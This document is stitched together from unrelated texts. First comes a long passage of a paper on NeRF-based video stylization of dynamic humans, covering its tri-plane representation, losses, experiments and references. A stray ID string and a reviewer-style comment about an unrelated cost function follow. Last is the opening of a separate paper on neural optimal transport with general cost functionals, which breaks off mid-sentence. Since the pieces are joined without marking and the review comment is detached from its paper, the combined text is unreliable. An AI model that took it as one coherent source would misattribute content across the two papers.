each ray onto the three planes. Volume rendering is then utilized to generate a feature vector for each pixel, followed by the injection of VGG feature of the style image and the employment of a lightweight decoder to yield stylized RGB values. In summary, based on the NeRF models, our method can model both dynamic humans and static scenes in a unified framework, allowing high-quality stylized rendering of novel poses and novel views. A naïve method to accomplish this new creative task might first utilize existing NeRF related method to generate the animated humans and novel views of a scene, followed by the application of existing video stylization techniques on these generated images. Our proposed method presents two notable advantages compared to it. First, by circumventing the use of predicted RGB images, our method applies stylization directly in the feature space, which tends to yield more consistent results compared to employing the generated images as input for video stylization. Second, our method enhances efficiency by eliminating the necessity for an image encoder, and instead, employs a lightweight decoder. This optimized architecture not only accelerates the processing speed but also maintains, if not enhances, the stylization quality across the diverse visual elements within the video narrative. The main contributions are outlined as follows: • We propose a video stylization framework for dynamic scenes, which can stylize novel views and animated humans in novel poses, given a monocular video and arbitrary style images. While traditional video stylization methods are built upon 2D networks, ours is developed from a 3D perspective. • We introduce a tri-plane-based representation and incorporate a geometric prior to model the 3D scenes. The representation is efficient and has better feature learning capability. • Compared to existing methods, the proposed method showcases a superior balance between stylized textures and temporal coherence, and holds the unique advantage of being adaptable to novel poses and various backgrounds. 2 RELATED WORK Video stylization. Video stylization extends image stylization (Gatys et al., 2016; Huang & Belongie, 2017) by enforcing temporal consistency of stylization across frames. This is achieved by exploring image-space constraints such as optical flow (Chen et al., 2017; Huang et al., 2017; Wang et al., 2020) and cross-frame feature correlation (Deng et al., 2021; Liu et al., 2021), as well as through careful design of feature transformations (Li et al., 2019; Liu et al., 2021). Nevertheless, stylization is confined to existing frames (or views) for the lack of a holistic scene representation. By contrast, our method presents the first 4D video stylization approach based on neural radiance fields. It is tailored for human-centric videos, achieves superior temporal consistency without image-space constraints, and uniquely supports stylized rendering of animated humans in novel views (Table 1a). Stylizing neural radiance fields. Neural radiance fields (NeRFs) are volumetric scene representations introduced for novel view synthesis (Mildenhall et al., 2020). NeRF has lately been adapted Figure 1: **Overview.** Given a camera ray, we sample foreground (human) and background (scene) points separately through the human and scene NeRFs. The points from the human are warped into canonical space via inverse warping. Then, each point is projected into three 2D planes to extract feature representation via bilinear interpolation, incorporated by Hadamard product. The features are utilized to predict the RGB appearance and density. We composite the foreground and background points for the dynamic foreground and multi-view background along each camera ray and apply volume rendering to attain the pixel feature on the 2D feature map. Subsequently, stylization is implemented on the feature map by AdaAttN (Liu et al., 2021), and a decoder is applied to process the stylized features, which are then decoded to the stylized image. Our model can stylize novel views and animated humans in the same scene by giving the novel camera parameters and articulation as extra inputs. for stylized novel view synthesis (Chiang et al., 2022; Zhang et al., 2022; Xu et al., 2023; Liu et al., 2023) as it provides strong geometric constraints to enforce multi-view consistency of stylization. Early methods bake the style into the weights of a NeRF and thus require learning one model for each style (Zhang et al., 2022; Xu et al., 2023). Most relevant to our work, StyleRF (Liu et al., 2023) enables zero-shot NeRF stylization via deferred style transformation, where 2D feature maps volume-rendered from a NeRF are modulated by an arbitrary style and subsequently decoded into a stylized image. Similar to StyleRF, our method leverages NeRF as the underlying scene representation and supports zero-shot stylization. Different from StyleRF, our method takes as input a monocular video of a moving human as opposed to multi-view images of a static scene (Table 1b). ### 3 METHODOLOGY Given a monocular video of a dynamic human and an arbitrary style image, our goal is to synthesize *stylized novel views* of a person with any *different poses* (i.e., animated humans) in a scene. To achieve this, we propose a unified framework (Figure 1) consisting of three modules: 1) two novel tri-plane based feature representation networks to encode geometric and appearance information of dynamic humans and their surroundings; 2) a style transfer module to modulate the rendered feature maps from NeRFs as conditioned on the input style image, 3) a lightweight decoder to synthesize the stylized images from novel viewpoints or new poses. We will present each module in detail. #### 3.1 GEOMETRY GUIDED TRI-PLANE BASED FEATURE REPRESENTATION Motivated by (Fridovich-Keil et al., 2023), we incorporate a tri-plane representation to model the 3D scene in canonical space, thereby reducing memory usage and accelerating the training and rendering processes compared to MLPs utilized in NeRF. The tri-plane representation describes a scene with three orthogonal planes \((P_{xy}, P_{xz}, P_{yz})\). For any 3D point, we project its 3D coordinate onto the three orthogonal planes to get corresponding locations in each plane. Then, the features of the 3D point are computed as the product of bilinearly interpolated features on three planes. A small MLP is used to decode the features into density and appearance. However, tri-plane features without spatial constraints are limited in expressiveness when directly optimized. This can be verified from Figure 2 that NeRF with tri-plane produces blurry results on Figure 2: Visual results of direct optimization using the tri-plane features and the geometry guided tri-plane features. Our method can recover more clear background texture (1st row) and sharper contours (2nd row). the wall and its boundary. To overcome this limitation, we propose to encode the 3D coordinates anchored to the tri-plane as the geometric prior over the whole space. Here we discretize the 3D space as a volume and divide it into small voxels, with sizes of 10 mm × 10 mm × 10 mm. Voxel coordinates transformed by the positional encoding \( \gamma_v(\cdot) \) are mapped onto three planes to serve as the input to the tri-plane. Encoded coordinates projected onto the same pixel are aggregated via average pooling, resulting in planar features with size \( H_{P_i} \times W_{P_i} \times D \), where \( P_i \) represents the \( i \)-th plane and \( D \) is the dimension of the feature on each plane. Motivated by U-Net architecture (Ronneberger et al., 2015), we use three encoders with 2D convolutional networks to represent the tri-plane features. To obtain the feature \( f_p(x) \) of a 3D point \( x = (x, y, z) \), we project the point onto three planes \( \pi_p(x), p \in (P_{xy}, P_{xz}, P_{yz}) \), where \( \pi_p \) presents the projection operation that maps \( x \) onto the \( p \)’th plane. Then, bilinear interpolation of a point is executed on a regularly spaced 2D grid to obtain the feature vector by \( \phi(\pi_p(x)) \). The operation of each plane is repeated to obtain three feature vectors \( f_p(x) \). To incorporate these features over three planes, we use the Hadamard product (element-wise multiplication) to produce an integrated feature vector, \( f(x) = \prod_{p \in (P_{xy}, P_{xz}, P_{yz})} f_p(x) \). Finally, \( f(x) \) will be decoded into color and density using two separate MLPs. Either Hadamard product or additional operations can be utilized to generate the feature vector \( f(x) \). We choose the Hadamard product here as it can generate spatially localized signals, which is a distinct advantage over addition, as described in (Fridovich-Keil et al., 2023). Figure 2 shows the proposed geometry guided method generates clearer background pixels than those by the one with direct optimization. Quantitative results on stylization can be found in Section 4.3. 3.2 Neural Radiance Fields We propose to leverage the NeRF to model 3D scenes and extend the original NeRF (Mildenhall et al., 2020) to achieve the purpose of stylization. In the original NeRF, the color and density are the direct output for any queried 3D point. But for each point on the camera ray, we predict a \( C \)-dimensional feature vector \( \hat{f}(x) \in \mathbb{R}^C \), motivated by (Niemeyer & Geiger, 2021; Liu et al., 2023). Specifically, for every queried point \( x \in \mathbb{R}^3 \), our model outputs its volume density \( \sigma \) and feature vector \( \hat{f}(x) \) by \( F_\Theta : (\hat{f}(x), \gamma_d(d)) \rightarrow (\sigma, \hat{f}(x)) \), where \( \gamma_d(d) \) represents the positional encoding on the view direction \( d \) and \( \hat{f}(x) \) is the feature vector extracted from the tri-plane. Then, the feature vector of any image pixel is derived by accumulating all \( N \) sampled points along the ray \( r \) through integration (Mildenhall et al., 2020), \[ f(r) = \sum_{i=1}^{N} w_i \hat{f}(x_i), \quad w_i = T_i \left(1 - \exp(-\sigma_i \delta_i)\right), \] where \( \sigma_i \) and \( \delta_i \) denote the volume density and distance between adjacent samples, \( w_i \) is the weight of the feature vector \( \hat{f}(x_i) \) on the ray \( r \), and \( T_i = \exp\left(-\sum_{j=1}^{i-1} \sigma_j \delta_j\right) \) is the accumulated transmittance along the ray. We treat the background across frames as multi-view images and train the scene NeRF for the background model with the human masked out in each frame. To capture dynamic humans with various poses, we train the human NeRF in the canonical space, leveraging priors with the deformation field by transforming the human from observation to canonical space. Here, the observation space describes the images from the input video, and the canonical space is the global one shared by all frames. Scene NeRF. We extract features from the background tri-plane to predict the density and feature vector \( \hat{f}_s(x) \) for each point with two tiny MLP networks. In detail, the density branch has one fully connected layer, while the feature branch utilizes a hidden layer comprising 128 units, followed by one output layer. Subsequently, the feature vectors on the same camera ray are aggregated to generate a feature vector \( \hat{f}_h(r) \) for each pixel using Equation 1. Human NeRF. The human NeRF is represented in a 3D canonical space. To synthesize a pixel on the human body for each video frame as in the observation space, the sampled points along the corresponding ray are transformed from the observation space into the canonical space by the rigid transformation associated with the closest point on the mesh. Here, we use a parametric SMPL (Loper et al., 2015) model to provide explicit guidance on the deformation of spatial points. This approach is beneficial for learning a meaningful canonical space while simultaneously reducing dependency on diverse poses when generalized to unseen poses. This allows us to train the NeRF in dynamic scenarios featuring a moving person and animate the person during inference. Motivated by (Chen et al., 2021b), the template pose in canonical space is defined as X-pose \( \theta_c \) because of its good visibility and separability of each body component in the canonical space. The pose \( \theta_o \) in the observation space can be converted to X-pose \( \theta_c \) in the canonical space by using the inversion of the linear skinning derived from the SMPL model. We extend these transformation functions to the space surrounding the mesh surface to allow the 3D points near the mesh to consistently move with adjacent vertices. Specifically, the inverse linear blend skinning is defined based on the 3D human skeleton. The human skeleton represents \( K \) parts that generate \( K \) transformation matrices \( \{G_k\} \in SE(3) \): \( \tilde{x} = \left( \sum_{k=1}^{K} w_o(x)k G_k \right)^{-1} x \), where \( w_o(x)k \) is the blend weight of the \( k \)-th part. \( x \) and \( \tilde{x} \) denote the 3D points in observation and canonical spaces respectively. This inverse function cannot fully express the deformation details caused by the rather complicated movement of clothes and misaligned SMPL poses. Thus, motivated by (Jiang et al., 2022), we adopt an error-correction network \( E \) to correct the errors in the warping field, which learns a mapping for a point from the observation space to the canonical space. Here, \( E \) comprises an MLP with the 3D point coordinates as the input and predicts the error. Therefore, the canonical point will be defined as \( \tilde{x}_c = \tilde{x} + E(x) \). For each point \( \tilde{x}_c \), we extract features from tri-plane of the human and utilize another lightweight decoder to predict the density and appearance \( \hat{f}_h(x) \). Composite NeRFs. To obtain the RGB value for each image pixel, two rays, one for the human NeRF and the other for the scene NeRF, are utilized. Colors and densities for the points on the two rays are obtained and are sorted in an ascending order based on the depth values. We then utilize Equation 1 to render a feature vector \( f(r) \) based on the points on the two rays. 3.3 Stylizing the Scene For the stylization module, it takes the above-mentioned NeRF rendered features (content features) and the style image as input and generates the stylized image based on the Adaptive Attention Normalization (AdaAttN) layer (Liu et al., 2021). The feature map of the style image is extracted from the pre-trained VGG network (Simonyan & Zisserman, 2014). Let \( F_s \) be the style features and \( F_c \) be the set of content features tailored to a 2D patch. Each pixel vector is rendered by Composite NeRFs introduced in Section 3.2. The style transfer module is formulated by \( F_{cs} = \psi(\text{AdaAttN}(\phi(F_c), F_s)) \), where \( \phi \) and \( \psi \), formulated as MLPs, are learned mappings for the content and stylized features, and AdaAttN (Liu et al., 2021) is designed to adaptively transfer the feature distribution from the style image to the content by the attention mechanism. Specifically, \( F_{cs} \) is generated by calculating the attention map within the features of the content and style images. The stylized feature \( F_{cs} \) will then be applied to generate the stylized image via a decoder. 3.4 Image Decoding Finally, an image decoder \( F_\theta \) is designed to mapping the stylized 2D feature \( F_{cs} \in \mathbb{R}^{H \times W \times M} \) that captures high-level information to the final stylized image \( I \in \mathbb{R}^{H \times W \times 3} \) at input resolution, \[ F_\theta : \mathbb{R}^{H \times W \times M} \rightarrow \mathbb{R}^{H \times W \times 3}. \] The operation \( F_\theta \) comprised of convolutional and ReLU activation layers, aiming to render a full-resolution RGB image, is parameterized as a 2D decoder. In the convolutional layer, we opt for \( 3 \times 3 \) kernel sizes without intermediate layers to only allow for spatially minor refinements to avoid entangling global scene properties during image synthesis. 3.5 Objective Functions We aim to stylize novel views of animated humans based on the reconstructed scene and humans. In the reconstruction stage, we first train the NeRFs by minimizing the rendered RGB image reconstruction loss. Afterward, in the stylization stage, we remove the last fully connected layer of the above-trained NeRF networks and attach the stylization module and the decoder to synthesize stylized images. Next, we introduce the losses adopted for training both the scene and human NeRFs and the objective functions for stylization. Scene NeRF. The objective function for training the scene NeRF is defined as $$L_s(r) = \sum_{r \in R} ||C_s(r) - \tilde{C}_s(r)||,$$ where $R$ is the set of rays. $C_s$ and $\tilde{C}_s$ denote the prediction and the ground truth RGB values, respectively. Human NeRF. The region covered by the human mask $M(\cdot)$ is optimized by $$L_r(r) = M(r)||C_h(r) - \tilde{C}_h(r)||,$$ where $C_h(r)$ and $\tilde{C}_h(r)$ are the rendered and ground truth RGB values. More losses to train the Human NeRF can be found in the appendix. After training the scene and human NeRFs for reconstruction, we discard the last fully connected layer. Then, the feature vector and density for sampled points are aggregated to render the feature vector as introduced in Composite NeRFs of Section 3.2. Finally, a decoder with convolutional and nonlinear layers converts the feature map into an RGB image. Here, two losses are applied, aiming to reconstruct the input video and also acquire semantic information for the feature patch $F_c$, $$L_v = ||F_c - \tilde{F}_c|| + \sum_{l \in l_p} ||F^l(I) - F^l(\tilde{I})|| + ||I - \tilde{I}||,$$ where $F_c$ and $\tilde{F}_c$ denote the rendered feature map and the feature extracted from the pretrained VGG network. $F(I)$ and $F(\tilde{I})$ are the predicted features and the features extracted from VGG with the RGB image as the input, respectively. In addition, $I$ and $\tilde{I}$ are the predicted and ground truth images. $l_p$ denotes the set of VGG layers. Stylization. We use the content and style losses from AdaAttN (Liu et al., 2021), encompassing both global style and local feature losses. The former ensures a global stylized effect, and the latter can generate better stylized output for local areas. 4 Experiments Implementation. We train our model in two stages: video reconstruction and stylization. In the reconstruction stage, the model is trained to predict input video frames. This facilitates the synthesis of novel views and further enables human animation. We apply the losses in Equation 3 and Equation 4 to minimize view reconstruction error and learn human pose transformations between the observation and canonical spaces. Once the training of scene and human NeRFs converges, we render the feature map of a sampled patch, which serves as the input to a 2D decoder that predicts the RGB values. Here, we freeze the density branch and the layers shared by the density and appearance branches. The subsequent layers are optimized using the losses in Equation 5. For the stylization stage, we utilize the content and style losses in AdaAttN as introduced in Section 3.5. We obtain a set of $N$ points using stratified sampling for both scene and human NeRFs, where $N$ is set to 128. All layers are trained using Adam (Kingma & Ba, 2015). The learning rate for frame reconstruction starts at $1 \times 10^{-4}$ and decays exponentially over the process of training. The learning rate for the stylization stage is set to $2 \times 10^{-5}$. Run time. Compared to the NeRF approaches that use MLPs to learn the feature representation for each sample point along the camera ray, the proposed tri-plane based representation significantly accelerates rendering, achieving a speedup of approximately 70% at inference time. Datasets. We utilize two datasets of monocular videos, including NeuMan (Jiang et al., 2022) and a dataset captured by our smartphone. The first dataset comprises six videos with 40 to 104 frames. It includes indoor and outdoor scenes with diverse human subjects of various genders and races. However, this dataset presents two primary limitations. First, frames extracted from longer videos produce less fluid transitions across frames. Second, the limited number of frames makes it difficult to evaluate the robustness of our proposed method. To compensate for this, we capture two additional videos, emphasizing longer duration and more diverse scenes with about 150-200 frames. Figure 3: **Visual comparison with state-of-the-art methods.** The first two rows show the stylization results given the captured video frame as the input for 2D video stylization methods. The last row utilizes the animated human generated by our method as the input. All results demonstrate the efficacy of the proposed method in generating the patterns and textures of the style images. Figure 4: **Examples about the novel view synthesis and animation.** The first two rows show the novel view results around the human by moving the camera from right to left. The third row visualizes the stylized human given different poses. ### 4.1 Qualitative Results **Comparison with state-of-the-art stylization methods.** We present visual comparison with state-of-the-art 2D video stylization methods LST (Li et al., 2019), AdaAttN (Liu et al., 2021), and CCPL (Wu et al., 2022) in Figure 3. It can be seen that the proposed method achieves better stylization on different subjects, as depicted in the 1st and 2nd rows. Our method can produce stylization with textures and patterns much more similar to the style images. In contrast, LST (Li et al., 2019) and AdaAttN (Liu et al., 2021) transfer fewer textures from the style image. Both LST (Li et al., 2019) and CCPL (Wu et al., 2022) generate blurry stylized images and exhibit more artifacts, particularly on the human and ground as seen in the 1st row. **Novel view synthesis and animation.** Unlike existing video stylization methods that perform stylization on the input view, our model is capable of stylizing images from novel views and novel Table 2: **Temporal consistency with 2D video stylization methods.** Consistency is calculated by warping error (J). The best and second best performances are in red and blue colors. | Models | LST [CVPR2019] | AdaAttN [ICCV2021] | CCPL [ECCV2022] | Ours | |--------------|----------------|--------------------|-----------------|------| | Our dataset | 0.169 | 0.161 | 0.231 | 0.165| | NeuMan | 0.226 | 0.239 | 0.298 | 0.214| Table 3: **Temporal consistency with 2D video stylization methods on novel views and animated humans.** The input of all methods are generated by the proposed method. Consistency is calculated by warping error (J). The best and second best performances are in red and blue colors. | LST[CVPR2019] | AdaAttN[ICCV2021] | IEContraAST[NeurIPS2021] | CSBNet[IJCAI2022] | CCPL[ECCV2022] | Ours | |---------------|--------------------|---------------------------|-------------------|----------------|------| | 0.159 | 0.152 | 0.269 | 0.247 | 0.239 | 0.143| Table 4: **Quantitative results on temporal consistency (lower is better).** The proposed method designed for dynamic scenes achieves much better performance compared to StyleRF. | | Our dataset | NeuMan | |----------------------|-------------|--------| | StyleRF / Ours | 0.293 / 0.165 | 0.387 / 0.214 | Figure 5: **User study on the original video space.** We present videos produced by two methods each time, and ask each volunteer to select the one with less flickering (consistency) and a better balance of temporal coherence and style quality (overall performance). Figure 6: **User study on novel views and animated humans.** We present videos produced by two methods each time, and ask each volunteer to select the one with less flickering (consistency) and a better balance of temporal coherence and style quality (overall performance). The inputs of all methods are predicted by the proposed method. poses, which benefits from the utilization of human and scene NeRFs. Once our model is adequately trained, it can seamlessly synthesize novel views and animate humans during inference. Visual examples can be found in Figure 4. ### 4.2 Quantitative Results **Consistency evaluation.** To quantify the consistency across frames, following (Liu et al., 2023), we leverage the optical flow, warp one frame to the subsequent one, and then compute the masked LPIPS score (Zhang et al., 2018). The consistency scores are obtained by comparing adjacent views and far-away views, respectively. The average results of these comparisons are presented in Table 2, Table 3 and Table 4. We compare the proposed method against state-of-the-art video stylization methods including LST (Li et al., 2019), AdaAttN (Liu et al., 2021), IEContraAST (Chen et al., 2021a), CSBNet (Lu & Wang, 2022), CCPL (Wu et al., 2022) and one NeRF-based multi-view method StyleRF (Liu et al., 2023). Compared to the 2D video stylization methods, our method shows better performance for consistency, which benefits from the consistent geometry learned by NeRF. The proposed method designed for dynamic scenes achieves much better performance compared to StyleRF. **User study.** We conduct a user study to gain deeper insights into the perceptual quality of the stylized images produced by our method in comparison to the baseline methods. Our study is organized into two sections: temporal consistency and overall synthesis quality. We visualize the results in Figure 5 and Figure 6 with approximately 3000 votes and 5000 votes, respectively. Figure 5 shows Table 5: **Ablation study with video stylization methods on temporal consistency.** By replacing the input of the 2D stylization methods with the rendered images by our method, we demonstrate that our unified framework can generate better results compared to the combination of NeRFs and 2D stylization methods. The best and second best performance are in red and blue colors. | Models | LST [CVPR2019] | AdaAttN [ICCV2021] | CCPL [ECCV2022] | Ours | |--------------|----------------|--------------------|----------------|------| | Our dataset | 0.185 | 0.179 | 0.261 | 0.165| | NeuMan | 0.248 | 0.267 | 0.321 | 0.214| Table 6: **Ablation study with the vanilla tri-plane (Fridovich-Keil et al., 2023) on temporal consistency (lower is better).** The proposed geometry-guided tri-plane encoded by U-Nets achieves better consistency than directly optimizing the features of the tri-plane (Fridovich-Keil et al., 2023). | Tri-plane (Fridovich-Keil et al., 2023) | Ours | |----------------------------------------|------| | | 0.207| 0.182| results on the original 2D videos and Figure 6 shows results on novel views and animated humans generated by the proposed method. On the original video space (Figure 5), our method outperforms the baseline methods in terms of overall synthesis quality, which underscores the efficacy of our method in striking a delicate balance between temporal coherence and stylization quality. On the novel views and animated humans (Figure 6), our method shows superior performance on all metrics, which demonstrates the efficacy of the proposed unified framework. More details can be found in supplementary material. ### 4.3 Ablation Studies In this work, we propose to address style transfer, novel view synthesis and human animation within a unified framework. An alternative approach could employ an existing dynamic NeRF-based method to predict animated humans and novel views in a scene, which is then followed by applying existing 2D video stylization methods. Here, we render frames with animated humans utilizing our first-stage method and then apply the rendered frames as the input to video stylization methods. The visual comparison is illustrated in the last row of Figure 3. As observed, our method paints the scene in the desired style while preserves the structure of the content image. Quantitative results can be found in Table 5, which demonstrates the advantages of our proposed unified framework. In addition, to demonstrate the efficacy of the proposed geometry-guided tri-plane, we show quantitative results in Table 6. It can be seen that the proposed geometry-guided tri-plane can generate better consistency than the vanilla tri-plane (Fridovich-Keil et al., 2023), which demonstrates the advantages of U-Nets to encode the tri-plane features than directly optimizing tri-plane features in (Fridovich-Keil et al., 2023). Visual results can be found in supplementary material. ### 5 Conclusion Our work looks into the problem of video stylization, with particular emphasis on dynamic humans. Going beyond the existing video stylization, we have proposed a unified framework for 3D consistent video stylization which also supports flexible manipulation of viewpoints and body poses of humans. To accomplish this, we incorporate NeRF representation to encode both the human subject and its surroundings and conduct stylization on the rendered features from NeRF. Specifically, a geometry-guided tri-plane representation is introduced to learn the 3D scene in a more efficient and effective manner. We have demonstrated both our superior performance on stylized textures and long-term 3D consistency with the unique capability of conducting novel view and animated stylization with extensive evaluations. **Limitations and future directions.** First, our current approach is constrained by the limited variation in camera pose and human face angles within the input video, restricting novel views to smaller angles. Future research can explore generative techniques to extrapolate unseen backgrounds and human features, enabling the creation of more expansive novel views. Second, while our current implementation has been optimized for speed, it still falls short of supporting real-time manipulation. One potential avenue for improvement is to pre-render stylized features and then reuse them across different views and various human poses to enhance real-time performance. Third, our method achieves the best trade-off between stylization and consistency. A future research direction could focus on achieving the utmost stylization effect without compromising consistency or style quality. REFERENCES Dongdong Chen, Jing Liao, Lu Yuan, Nenghai Yu, and Gang Hua. Coherent online video style transfer. In IEEE International Conference on Computer Vision, 2017. Haibo Chen, Zhizhong Wang, Huiming Zhang, Zhiwen Zuo, Ailin Li, Wei Xing, Dongming Lu, et al. Artistic style transfer with internal-external learning and contrastive learning. Advances in Neural Information Processing Systems, 34:26561–26573, 2021a. Jianchuan Chen, Ying Zhang, Di Kang, Xuefei Zhe, Linchao Bao, Xu Jia, and Huchuan Lu. Animatable Neural Radiance Fields from Monocular RGB Videos. arXiv preprint arXiv:2106.13629, 2021b. Pei-Ze Chiang, Meng-Shiun Tsai, Hung-Yu Tseng, Wei-Sheng Lai, and Wei-Chen Chiu. Stylizing 3D scene via implicit representation and hypernetwork. In IEEE Conference Computer Vision and Pattern Recognition, 2022. Yingying Deng, Fan Tang, Weiming Dong, Haibin Huang, Chongyang Ma, and Changsheng Xu. Arbitrary video style transfer via multi-channel correlation. In Association for the Advancement of Artificial Intelligence, 2021. Sara Fridovich-Keil, Giacomo Meanti, Frederik Rahbeck Warburg, Benjamin Recht, and Angjoo Kanazawa. K-planes: Explicit radiance fields in space, time, and appearance. In IEEE Conference Computer Vision and Pattern Recognition, 2023. Leon A Gatys, Alexander S Ecker, and Matthias Bethge. Image style transfer using convolutional neural networks. In IEEE Conference Computer Vision and Pattern Recognition, 2016. Haozhi Huang, Hao Wang, Wenhan Luo, Lin Ma, Wenhao Jiang, Xiaolong Zhu, Zhifeng Li, and Wei Liu. Real-time neural style transfer for videos. In IEEE Conference Computer Vision and Pattern Recognition, 2017. Xun Huang and Serge Belongie. Arbitrary style transfer in real-time with adaptive instance normalization. In IEEE International Conference on Computer Vision, 2017. Yi-Hua Huang, Yue He, Yu-Jie Yuan, Yu-Kun Lai, and Lin Gao. StylizedNeRF: consistent 3d scene stylization as stylized nerf via 2d-3d mutual learning. In IEEE Conference Computer Vision and Pattern Recognition, 2022. Wei Jiang, Kwang Moo Yi, Golnoosh Samei, Oncel Tuzel, and Anurag Ranjan. NeuMan: Neural human radiance field from a single video. In European Conference on Computer Vision, 2022. Diederik P Kingma and Jimmy Ba. Adam: A method for stochastic optimization. In International Conference on Learning Representation, 2015. Xueting Li, Sifei Liu, Jan Kautz, and Ming-Hsuan Yang. Learning linear transformations for fast image and video style transfer. In IEEE Conference Computer Vision and Pattern Recognition, 2019. Kunhao Liu, Fangneng Zhan, Yiwen Chen, Jiahui Zhang, Yingchen Yu, Abdulmotaleb El Saddik, Shijian Lu, and Eric P Xing. StyleRF: Zero-shot 3D Style Transfer of Neural Radiance Fields. In IEEE Conference Computer Vision and Pattern Recognition, 2023. Songhua Liu, Tianwei Lin, Dongliang He, Fu Li. Meiling Wang, Xin Li, Zhengxing Sun, Qian Li, and Errui Ding. AdaAttn: Revisit attention mechanism in arbitrary neural style transfer. In IEEE Conference Computer Vision and Pattern Recognition, 2021. Matthew Loper, Naureen Mahmood, Javier Romero, Gerard Pons-Moll, and Michael J Black. SMPL: A skinned multi-person linear model. ACM Transactions on Graphics, 34(6):1–16, 2015. Haofei Lu and Zhizhong Wang. Universal video style transfer via crystallization, separation, and blending. In International Joint Conferences on Artificial Intelligence, pp. 23–29, 2022.
gIiz7tBtYZ
Another point is that the cost function proposed in Prop.1 contains a quadruple sum over samples: a discussion about its variance would be welcome. Also, the proposition mentions that it is an estimator: in which sense?
Neural Optimal Transport with General Cost Functionals Arip Asadulaev∗1,3 Alexander Korotin∗2,1 Vage Egiazarian4,5 Petr Mokrov2 Evgeny Burnaev2,1 1 Artificial Intelligence Research Institute 2 Skolkovo Institute of Science and Technology 3 Moscow Institute of Physics and Technology 4 HSE University 5 Yandex [email protected],[email protected] Abstract We introduce a novel neural network-based algorithm to compute optimal transport (OT) plans for general cost functionals. In contrast to common Euclidean costs, i.e., \( \ell^1 \) or \( \ell^2 \), such functionals provide more flexibility and allow using auxiliary information, such as class labels, to construct the required transport map. Existing methods for general cost functionals are discrete and do not provide an out-of-sample estimation. We address the challenge of designing a continuous OT approach for general cost functionals in high-dimensional spaces, such as images. We construct two example functionals: one to map distributions while preserving the class-wise structure and the other one to preserve the given data pairs. Additionally, we provide the theoretical error analysis for our recovered transport plans. Our implementation is available at https://github.com/machinestein/gnot. Figure 1: Results of our method with the pair-guided cost functional (§6.2) applied to the supervised image-to-image translation task (Celeba-MaskHQ dataset, 256 × 256 images). 1 Introduction Optimal transport (OT) is a powerful framework to solve mass-moving problems for data distributions which finds many applications in machine learning and computer vision (Bonneel & Digne, 2023). Most existing methods to compute OT plans are designed for discrete distributions (Flamary et al., 2021; Cuturi, 2013). These methods have good flexibility and allow to control the properties of the plan (Peyré et al., 2019). However, discrete methods find an optimal matching between two given (train) sets which does not generalize to new (test) data points. This limits the use of discrete OT plan methods in scenarios where new data needs to be generated, e.g., image-to-image transfer (Zhu et al., 2017). ∗Equal contribution. Recent works (Rout et al., 2022; Korotin et al., 2023b, 2021b; Fan et al., 2023; Daniels et al., 2021) propose continuous methods to compute OT plans. Thanks to employing neural networks to parameterize OT solutions, the learned transport plan can be used directly as the generative model in data synthesis (Rout et al., 2022) and unpaired learning (Korotin et al., 2023b; Rout et al., 2022; Daniels et al., 2021; Gazdieva et al., 2022). Existing continuous OT methods mostly focus on classic cost functions such as \( \ell^2 \) (Korotin et al., 2021b, 2023b; Fan et al., 2023; Gazdieva et al., 2022), which estimate the closeness of input and output points. However, choosing such costs for problems where a specific optimality of the mapping is required may be challenging. For example, when one needs to preserve the object class during the transport (Figure 2), common \( \ell^2 \) cost may be suboptimal (Su et al., 2022, Appendix C), (Daniels et al., 2021, Figure 3). This limitation could be fixed by considering general cost functionals (Paty & Cuturi, 2020) which may take into account additional information, e.g., class labels. Despite the large popularity of OT, the approach for continuous OT with general cost functionals (general OT) is still missing. We address this limitation. The main contributions of our paper are: 1. We show that the general OT problem (\( \S 2 \)) can be reformulated as a saddle point optimization problem, which allows to implicitly recover the OT plan (\( \S 4.1 \)) in the continuous setting. The problem can be solved with neural networks and stochastic gradient methods (Algorithm 2). 2. We provide the error analysis of solving the proposed saddle point optimization problem via the duality gaps, i.e., errors for solving inner and outer optimization problems (\( \S 4.2 \)). 3. We construct and test examples of general cost functionals for mapping data distributions with the preservation of the class-wise (\( \S 5.1 \)) Algorithm 1 and paired data structure (\( \S 5.2 \)) Algorithm 3). From the theoretical perspective, our max-min reformulation is generic and subsumes previously known reformulations for classic (Rout et al., 2022; Fan et al., 2023) and weak (Korotin et al., 2021b) OT. Furthermore, existing error analysis works exclusively with the classic OT and operate only under certain restrictive assumptions such as the convexity of the dual potential. Satisfying these assumptions in practice leads to a severe performance drop (Korotin et al., 2021c, Figure 5a). In contrast, our error analysis is free from assumptions on the dual variable and, besides general OT, it is applicable to weak OT for which there is currently no existing error analysis. From the practical perspective, we apply our method to the dataset transfer problem (Figure 2), previously not solved using continuous optimal transport. This problem arises when it is necessary to repurpose fixed or black-box models to classify previously unseen partially labelled target datasets with high accuracy by mapping the data into the dataset on which the classifier was trained (Alvarez Melis & Fusi, 2021). Our method achieves notable improvements in accuracy over existing algorithms. Also, we show the performance of our method on the supervised image-to-image translation task. Notations. For a compact Hausdorff space \( S \), we use \( P(S) \) to denote the set of Borel probability distributions on \( S \). We denote the space of continuous \( \mathbb{R} \)-valued functions on \( S \) endowed with the supremum norm by \( C(S) \). Its dual space is the space \( M(S) \supseteq P(S) \) of finite signed Borel measures over \( S \). Let \( X, Y \) be compact Hausdorff spaces and \( P \in P(X), Q \in P(Y) \). We use \( \Pi(P) \subset P(X \times Y) \) to denote the subset of probability distributions on \( X \times Y \), which projection onto the first marginal is \( P \). We use \( \Pi(P,Q) \subset \Pi(P) \) to denote the subset of probability distributions (transport plans) on \( X \times Y \) with marginals \( P, Q \). For a measurable map \( T : X \times Z \rightarrow Y \), we denote the associated push-forward operator by \( T_\# \). 2 BACKGROUND In this section, we provide key concepts of the optimal transport theory. Throughout the paper, we consider compact \( X = Y \subset \mathbb{R}^D \) and \( P, Q \in P(X), P(Y) \). Classic and weak OT. For a cost function \( c \in C(X \times Y) \), the OT cost between \( P, Q \) is \[ \text{Cost}(P, Q) \overset{\text{def}}{=} \inf_{\pi \in \Pi(P,Q)} \int_{X \times Y} c(x,y) d\pi(x,y), \] see (Villani, 2008, §1). We call (1) the classic OT. Problem (1) admits a minimizer \( \pi^* \in \Pi(P,Q) \), which is called an OT plan (Santambrogio, 2015, Theorem 1.4). It may be not unique (Peyré et al., 2019, Remark 2.3). Intuitively, the cost function \( c(x,y) \) measures how hard it is to move a mass piece between points \( x \in X \) and \( y \in Y \). That is, \( \pi^* \) shows how to optimally distribute the mass of \( P \) to \( Q \), i.e., with minimal effort. For cost functions \( c(x,y) = \|x - y\|_2 \) and \( c(x,y) = \frac{1}{2} \|x - y\|_2^2 \), the OT cost (1) is called the Wasserstein-1 ($W_1$) and the (square of) Wasserstein-2 ($W_2$) distance, respectively, see 